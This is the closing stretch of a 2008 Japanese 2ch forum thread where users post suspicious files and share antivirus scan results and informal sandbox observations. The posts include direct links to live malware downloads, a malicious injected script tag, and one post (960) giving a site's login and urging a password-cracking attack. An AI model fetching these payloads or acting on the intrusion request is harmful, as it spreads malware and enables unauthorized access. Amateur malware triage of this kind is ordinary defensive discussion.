AVGで検出したもの
http://www.virustotal.com/analisis/bffcc77feb19478b7c90f66a77847c5d
http://www.virustotal.com/analisis/f4a6e7e6c9e3bfc852821ecb30a37f80

899 :名無しさん@お腹いっぱい。:2008/06/20(金) 23:06:47
ま、カスペとAVGがウイルスといってる以上ウイルスなんじゃね?

900 :名無しさん@お腹いっぱい。:2008/07/04(金) 23:17:23
 

901 :名無しさん@お腹いっぱい。:2008/07/04(金) 23:19:04
 

902 :インスコマン ◆qlwUrCXXtM :2008/07/31(木) 14:53:41
1.http://www5.uploader.jp/user/tane/images/tane_uljp00056.png
2.http://www5.uploader.jp/user/tane/images/tane_uljp00055.png

3.http://www5.uploader.jp/user/tane/images/tane_uljp00054.png
過疎ってるからage

MBAMお勧め!(上のマルウェアも大方これで削除可能!ComboFixもお勧め!)
ttp://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

903 :インスコマン ◆qlwUrCXXtM :2008/07/31(木) 14:58:06
>>902の画像のさいとのURLのっけときます
195.225.176.63/in.php?id=16&se=1&keyword=Polliciy22.info&host=gremmioti.cn&dkw=

904 :名無しさん@お腹いっぱい。:2008/07/31(木) 18:08:30
インスコマーーーーン (´Д⊂

905 :名無しさん@お腹いっぱい。:2008/08/02(土) 23:49:50
すみません、原田ウイルス00(ダブルオー)というマルウェアを
お持ちの方提供していただけないでしょうか? 未だに遭遇できないので。

906 :名無しさん@お腹いっぱい。:2008/08/03(日) 21:04:53
>>905
http://tmp7.2ch.net/download/

907 :名無しさん@お腹いっぱい。:2008/08/04(月) 07:11:31
http://www.gamesrb.com/rbv/uu.exe
http://www.gamesrb.com/rbv/uu.rar

これの駆除に苦労したわー

大手ベンダースルーしまくりだったので要注意

908 :名無しさん@お腹いっぱい。:2008/08/04(月) 13:34:17
>>907
ttp://www.virustotal.com/analisis/3e853c3d9baa9c893c309cf40e91a2ea

909 :名無しさん@お腹いっぱい。:2008/08/06(水) 10:03:30
ttp://www.virustotal.com/jp/analisis/1ad8d2f4cbba6f192e54ef4de3182591

やられた…………NOD32無反応…………

910 :名無しさん@お腹いっぱい。:2008/08/06(水) 13:22:28
>>909
NOD32どころかカスペ以外の主要ベンダーは全滅じゃねーか!!
Symantec、Trend MicroどころかAntiVir、avast!、AVG、BitDefenderまでスルー。
まずはその検体を↑のベンダーに提出してみては?

911 :名無しさん@お腹いっぱい。:2008/08/06(水) 18:37:59
>910
無論、8/5の時点で提出済み。そのときは、どのソフトもウイルス判定してませんでした。

今日の朝になるまでは、カスペすら全く反応無し。

あからさまにネットワークの使用量が跳ね上がったので、おかしいとは思ったんだけど、
ウイルス判定が全く出なかったので自分の勘違いかと思ったよ。

タスクマネージャみたら、妙な名前のプロセスだけが動いてるもんだから、これ以外、あり得なかったのだが。
アドバンストヒューリスティックエンジンを過信しすぎるのも禁物だな……いい経験になったよ。






912 :名無しさん@お腹いっぱい。:2008/08/06(水) 21:05:53
http://uploadr.net/file/ac27de91b5

913 :名無しさん@お腹いっぱい。:2008/08/06(水) 21:10:22
http://uploadr.net/file/ac27de91b5

914 :名無しさん@お腹いっぱい。:2008/08/06(水) 23:24:10
>>912
AVGが反応したぞ。なんだこれは。

915 :名無しさん@お腹いっぱい。:2008/08/07(木) 09:53:07
912はAntiVirもavast!もBitDefenderも反応する。
Symantecまで反応するがカスペはスルーした。

916 :名無しさん@お腹いっぱい。:2008/08/07(木) 10:54:56
>>914-915
他スレで晒されていた"NeorageX"というエミュレータのhack版らしいw
多分、誤検出。

917 :名無しさん@お腹いっぱい。:2008/08/07(木) 11:00:48
>>916
AntiVir、avast!、AVG、BitDefender、McAfee、NOD32、Symantecまで検出してるのにこれが誤検出?
ここまで主要ベンダーが検出してるのにとても誤検出とは考えにくいんですけど・・・?

918 :名無しさん@お腹いっぱい。:2008/08/07(木) 11:55:34
>>917
実行してみたけど、普通にエミュレータとして動作したよ?

919 :名無しさん@お腹いっぱい。:2008/08/07(木) 16:19:55
そんなの検体送ればすぐ分かる事

920 :名無しさん@お腹いっぱい。:2008/08/07(木) 18:30:45
clamではスルーされたorz

921 :名無しさん@お腹いっぱい。:2008/08/10(日) 22:07:30
そもそもキーを入力しないと、unpackが進まない予感

パックされた本体(PDATA)を除いて、スタブだけにして送ってみた
(整合性が失われた状態のファイルのスキャン結果は、ベンダのポリシにもよるため、参考値)
http://www.virustotal.com/analisis/2bc3aad954364fa6444106b88f264154

922 :名無しさん@お腹いっぱい。:2008/08/10(日) 22:47:30
そもそも本当にウイルスなら実行した時点でキーの入力なんて求めるわけないし、
わざわざキーを入力しないとウイルスとして動けないなんてものあるわけないw

923 :名無しさん@お腹いっぱい。:2008/08/10(日) 23:18:46
…まあ、実行してみたサンドボックスのせいで、
通常要求してこないキー要求があったのかもしれないとも思ってたり
パッカって意外とそんなもん。

っていう雑談

924 :名無しさん@お腹いっぱい。:2008/08/10(日) 23:36:01
一応>>912のファイルはzlib.dllとneogeoのbiosが無いと起動すらしないはず。
さらに以下のキーを入力しないとちゃんと動作しない。
Emu-Zone
6FB3-2BC0-A3B4-B5A5

925 :名無しさん@お腹いっぱい。:2008/08/11(月) 00:54:58
Z. 起動はしないけど、制御は本体までたどり着ける
entry 48876c かな
つかこれ、何層パッカかかってるんだか
制御を奪取できればおんなじことなんだが、誤検出だとしたれら、それを招いてる原因にはなるかも

一応、その時点でダンプしたものをVTに押し込んでみた
純粋にダンプしただけ PEファイルとして一貫性はないので、著しく参考値
http://www.virustotal.com/analisis/942814cab7eab062bce1d43ba6a75303

で、本体について
ぱっと見には、通信機能はなさげかもだけど、有害じゃない。と言い切ることは昨今不可能に近いので、
それこそ、サンドボックス内での実行を勧めるというあたりかと

926 :名無しさん@お腹いっぱい。:2008/08/11(月) 17:05:59
明らかにマイクロソフトじゃない所からメールで
IE最新版ダウンロードとかいってそれらしくexeファイルにリンクされてるんですが
これは危険ですか?
www.altotrabajosverticales.com/images/ie7.0.exe


927 :名無しさん@お腹いっぱい。:2008/08/11(月) 17:25:21
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSMALL%2EEBN&VSect=P

928 :名無しさん@お腹いっぱい。:2008/08/11(月) 20:59:15
途中まで踏んでみた
中にこれ入ってた (UPXかかってるので、サイズはまったく異なる)

http://www.microsoft.com/technet/sysinternals/Miscellaneous/BlueScreen.mspx
http://download.sysinternals.com/Files/BlueScreen.zip

セキュ板に居るくらいの人なら、出てくるエラーの内容で、ただのブルースクリーンじゃないと気づくだろうけど、
(ネタエラーが出てくることもあるし、そうでなくても、見かけない種類のエラーを吐く)
普通だとナンダコリャ?ってなるだろうな

NoDispScrSavPage, NoDispBackgroundPage が設定されるのは、前評判どおり

929 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:30:48
>>928
そのscrロックされて解除できなくなるそうだ。

930 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:52:05
うん。NoDispScrSavPage によるところかな、他にもあるのかな
なんにせ、本家のやつで楽しめばおk

931 :名無しさん@お腹いっぱい。:2008/08/12(火) 16:33:03
>926 さっき俺が踏んでみたww
ニセセキュリティが起動して
お前は感染してるだの何だの言ってきた
IEのTOP(の一部?)とか壁紙とか変えられちまった

ttp://www-2ch.net:8080/up/ ここの
08/08/12(Tue) 15:32:29 のファイルが
その時のスクリーンショットだから
見たいやつは見て来い

932 :名無しさん@お腹いっぱい。:2008/09/04(木) 00:17:08
http://free.prohosting.com/njdfgse/index3.html

http://fire.prohosting.com/gjkuydft/cgi-bin/ver4/board.cgi?mode=view&no=222
こんばんは、重要なお知らせがあります。
この板で虚空氏(おそらくトリップ盗んだ偽者)の提供品の2つがウィルス仕込みがなされているのはご存知かもしれないですが、どうやらこのウィルスは某所にスクリーンキャプチャの画像を貼り付け、荒らし行為を行うものらしいです。
たまたまそこのキャプチャ画像にここのサイトが映っていたので注意を促しました。
また2chにも同じ名前で書き込みがあることから、2chにも書き込みしているものと思います。

前に公開したツールを使って駆除をオススメ致します。
http://home.no/adobephotoshop/Project1.zip  確認
↑↑↑↑↑↑↑↑↑↑
これお願いします


私が確認している限りではユーザー名が、

Ak○○○sa 氏
倉○広 氏

○は文字が入ります。まえは-Z○N-氏という方がいましたが最近見なくなりました。
もし心あたりがある方、OSを再インストするか駆除ツール使うかしてください。アンチウィルスは対応していないと思われます(キャプチャ画像にノートンがあったので)

管理人さんはこの私の書き込みが適切でなかったら削除されても結構ですが、トップに警告はして頂きたいと思います。

では。

virustotal
ttp://www.virustotal.com/analisis/f179a22ceba59983edf9fdc18a4d311c

933 :名無しさん@お腹いっぱい。:2008/09/05(金) 09:38:08 ?2BP(0)
project1.exeは、ぱっと見、Delphiでぱぱっと作成された、
http://changi.2ch.net/test/read.cgi/download/1220292628/364
のキーを検出し、あれば除去するツールのようです
OEP 45c4e0 問題のアプリ(今件真犯人)の強制終了はできない?
こうゆうときは、マルウェアに人気のパッカではなく、UPXくらいにしといたほうが

プログラムを隅から隅まで読んでいるわけではありませんから、完全な安全判定ではありません


934 :名無しさん@お腹いっぱい。:2008/09/05(金) 09:56:41 ?2BP(0)
あー。強制終了機能ありました うそつきゴメス

935 :名無しさん@お腹いっぱい。:2008/09/09(火) 08:39:16 ?2BP(0)
その後、一部アンチウイルスソフトベンダがクロ判定をしたとのウワサを聞きました
詳細不明なのですけど、念のため、シロ寄りのグレーから、クロ寄りのグレーに変更いたします

936 :名無しさん@お腹いっぱい。:2008/09/09(火) 23:17:18
>>907
今更ながらhttp://www.gamesrb.com/rbv/uu.exeを踏んでしまいました。
ファイルはダウンロードしてないんですが、踏んだだけでNGですか?

937 :名無しさん@お腹いっぱい。:2008/09/11(木) 00:56:05
単体を実行した際、Windowsディレクトリに何か吐き出すようですので、適宜清掃してください

…そっからすすまん…パッカと砂箱との相性わるいよママン…。(バレちゃう以前に、失敗するらしい)

938 :名無しさん@お腹いっぱい。:2008/09/11(木) 11:02:41
>>936
実行を選択しなければ問題ない

939 :名無しさん@お腹いっぱい。:2008/09/11(木) 18:08:50
>>938
ありがとうございます。
次回から気をつけたいと思います。

940 :名無しさん@お腹いっぱい。:2008/09/13(土) 00:16:03
すみません。
これ、Keygen.exeなんですけど、一瞬コマンドプロンプトの
黒い画面が出て、消えました。それで、何も起こりません。
一応実行する前に、Norton Antivirusでスキャンしたんで
すけど、問題無いとのことでした。
一体何だったんだろう?

http://www3.uploader.jp/dl/pc9801/pc9801_uljp00206.zip.html

941 :名無しさん@お腹いっぱい。:2008/09/13(土) 01:07:05
>>940
ほらよ
http://www.virustotal.com/jp/analisis/e0d1f2fef396fbc4151b20358e6e0520

黒判定だけど中国製のバスターやキラーだと検出できないよ

942 :名無しさん@お腹いっぱい。:2008/09/16(火) 21:04:19
ttp://www1.axfc.net/uploader/He/so/138811
DLpass:ayasii
こいつらはどうでしょうか?

943 :名無しさん@お腹いっぱい。:2008/09/17(水) 18:31:46
>>942
He_138811
http://www.virustotal.com/jp/analisis/10ada89c1891cc25d270c36652e495f4

0001.exe
http://www.virustotal.com/jp/analisis/6dceb21cc09883aad237aa7110ca38dc

keikei_uljp00122.exe
http://www.virustotal.com/jp/analisis/84ff69772e1216738aec7daf6805f2fe

944 :名無しさん@お腹いっぱい。:2008/09/17(水) 22:41:01
誰でも使えるwebサービスを貼り付けるスレなのここ?
実行してねえじゃんwww

945 :名無しさん@お腹いっぱい。:2008/09/18(木) 01:15:37
内容によっては、引き受け手が少ない案件もあるのさ

946 :名無しさん@お腹いっぱい。:2008/09/20(土) 01:17:39
なんでも実行する勇敢で知恵に富んだ者が集まるスレだと思ってた

947 :名無しさん@お腹いっぱい。:2008/09/21(日) 15:40:08
ここは鑑定スレじゃねーんだよ

948 :名無しさん@お腹いっぱい。:2008/09/21(日) 15:47:01
http://www3.uploader.jp/dl/ikedango/ikedango_uljp00001.cab.html

949 :名無しさん@お腹いっぱい。:2008/09/21(日) 19:49:13
実行するまでもなく、フォーマットするかもしれないショートカット
無害でも無益 Shoさんてだれですか

950 :名無しさん@お腹いっぱい。:2008/09/24(水) 23:57:46
うめ

951 :名無しさん@お腹いっぱい。:2008/09/27(土) 00:32:07


952 :名無しさん@お腹いっぱい。:2008/09/28(日) 12:53:56
http://1039045726:65535/jp.js

953 :名無しさん@お腹いっぱい。:2008/09/28(日) 15:09:41
本体t.gif.gif

954 :名無しさん@お腹いっぱい。:2008/09/28(日) 15:56:58
>>952
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2F1039045726%3A65535%2Fjp.js&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
Lineage II 板「<script src=http://1039045726:65535/jp.js></script>
最近このサイトを見た方は、 ウイルスチェックとパスワードの変更をお勧めします。
>>追記これは少し前に XREA がやられた時と同じタイプなので、 (省略されました・・全てを読むにはここを ...
jbbs.livedoor.jp/game/7135/ - 39k - キャッシュ - 関連ページ - メモをと

ttp://www.virustotal.com/jp/analisis/89ecab35bb571338676d641fa814cca7

955 :名無しさん@お腹いっぱい。:2008/09/28(日) 21:59:09
>>953
実行してもこの手のタイプのマルウェアは目立った症状がないから
困る。悪玉も見つかんないし。ネトゲインスコされてないから動作してナインかな

956 :955:2008/09/28(日) 22:19:42
さっきからexplorerの動作が安定しない
やっぱマルウェア動いてんのかな・・・

957 :名無しさん@お腹いっぱい。:2008/09/29(月) 13:13:29
hostsを書き換えにいったみたいなのと、何かDLLを一個吐いたところまではみたけど、
感染行動が途中で止まっちまったらしい

958 :名無しさん@お腹いっぱい。:2008/10/04(土) 10:46:45
ニーズのバカが集まるスレ

959 :名無しさん@お腹いっぱい。:2008/10/04(土) 16:56:27
テスト

960 :名無しさん@お腹いっぱい。:2008/10/18(土) 14:09:06
ttp://pjc.earthinter.co.jp/
User:todo
Pass:todo
Prease check other member's name and try password crack atack.

961 :名無しさん@お腹いっぱい。:2008/10/18(土) 14:20:54
侵入テストかなんかでしたら、スレチです
そこが、たとえば改竄を受けている等して、あやしげな何かが貼られているなら、転載してください

962 :名無しさん@お腹いっぱい。:2008/10/18(土) 19:12:04
ttp://sageuploader.if.land.to/cgi-bin/1upload/src/sage1_7151.mid
↑のファイルを再生したら変な音がして青画面になった後
勝手に再起動してしまいました
どんなウイルスなのか教えてください

963 :名無しさん@お腹いっぱい。:2008/10/18(土) 19:17:58
ネットワーク
http://pc11.2ch.net/hack/

勇気がなくて踏めない人のための鑑定スレPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/

964 :名無しさん@お腹いっぱい。:2008/10/18(土) 19:21:49
>>963
ごめんありがとそこに行ってくる

965 :インスコマン ◆qlwUrCXXtM :2008/10/18(土) 22:03:03
>>962
ウイルスでもなんでもない。
ただパソコンブルースクリーンになって落ちるだけ
http://www.dotup.org/uploda/www.dotup.org0878.jpg

ザビビのこのスレ思い出した。テラナツカシス。
http://hack.dot.thebbs.jp/1072610967.1-100

966 :名無しさん@お腹いっぱい。:2008/10/21(火) 08:26:40
俺が支配されそうですワロタw

967 :名無しさん@お腹いっぱい。:2008/10/22(水) 03:10:38
http://im3a.atura.jp/bbs5/31207/img/0005871719.zip
某掲示板で拾った物、中身はexeでウイルスらしい

968 :名無しさん@お腹いっぱい。:2008/10/22(水) 06:34:01
>>967
http://www.virustotal.com/analisis/f33790aa0b7e3d622feceb44b1eac129

969 :名無しさん@お腹いっぱい。:2008/10/22(水) 09:28:08
35/36にワラタ

970 :名無しさん@お腹いっぱい。:2008/10/22(水) 23:13:15
半実行してみた hosts書き換えしたりするぽい
中にはいってたファイルあげてみたよ (ゴミがついてるので、サイズとかハッシュはスルーでよろ)

http://www.virustotal.com/analisis/75b11218d0ec2011be7d7ee486d60d3f

971 :名無しさん@お腹いっぱい。:2008/10/22(水) 23:54:36
ウイルスが古すぎて・・・
ぜんぜんあやしくねーじゃんみたいな

972 :名無しさん@お腹いっぱい。:2008/10/22(水) 23:59:49
みたいなって・・・

973 :名無しさん@お腹いっぱい。:2008/10/24(金) 01:16:02
http://www.dotup.org/uploda/www.dotup.org3585.exe.html

これウイルスかわかる方いますか?
virustotalでも微妙な線でした・・・。

974 :名無しさん@お腹いっぱい。:2008/10/24(金) 01:16:32
ageます

975 :名無しさん@お腹いっぱい。:2008/10/24(金) 06:00:12
もうありません、404 ご期待に沿えるかどうかわかりかねますが、なんでしたら再うpしてください

976 :名無しさん@お腹いっぱい。:2008/10/24(金) 16:52:37
いまさらですが「entsver.exe」の最新亜種を踏んでみました
15ai.comとかいう、中華のサイトになにやら怪しげなパケット
飛ばしています
なんか、自虐てきでカワイイ奴ですね

977 :名無しさん@お腹いっぱい。:2008/11/02(日) 01:52:51
         _,,..,,,,_
        ./ ,' 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"

978 :名無しさん@お腹いっぱい。:2008/11/24(月) 16:27:01
age

979 :名無しさん@お腹いっぱい。:2008/11/24(月) 16:27:39
sage

980 :名無しさん@お腹いっぱい。:2008/11/24(月) 17:14:17
うんk

981 :名無しさん@お腹いっぱい。:2008/11/24(月) 21:33:19
sn00p

982 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:26:26
うめんの?

983 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:28:16
umeume

984 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:31:47
         _,,..,,,,_
        ./ ,' 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"

         _,,..,,,,_
        ./ ,。 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"

985 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:35:27
985ゲット

986 :Qちゃん:2008/11/24(月) 22:43:31
後14km

987 :Qちゃん:2008/11/24(月) 22:46:24
13

988 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:47:30
12

989 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:50:06
11

990 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:50:19
qq

991 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:51:02
いきますよ

992 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:52:51
877

993 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:53:19
993

994 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:54:23
ヾ( ´ー`)(^_^;)

995 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:55:07
umeee

996 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:55:33
996

997 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:56:35
99!!

998 :名無しさん@お腹いっぱい。:2008/11/24(月) 22:58:17
98?

999 :名無しさん@お腹いっぱい。:2008/11/24(月) 23:00:38
テスト

1000 :名無しさん@お腹いっぱい。:2008/11/24(月) 23:01:30
last一本

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

224 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)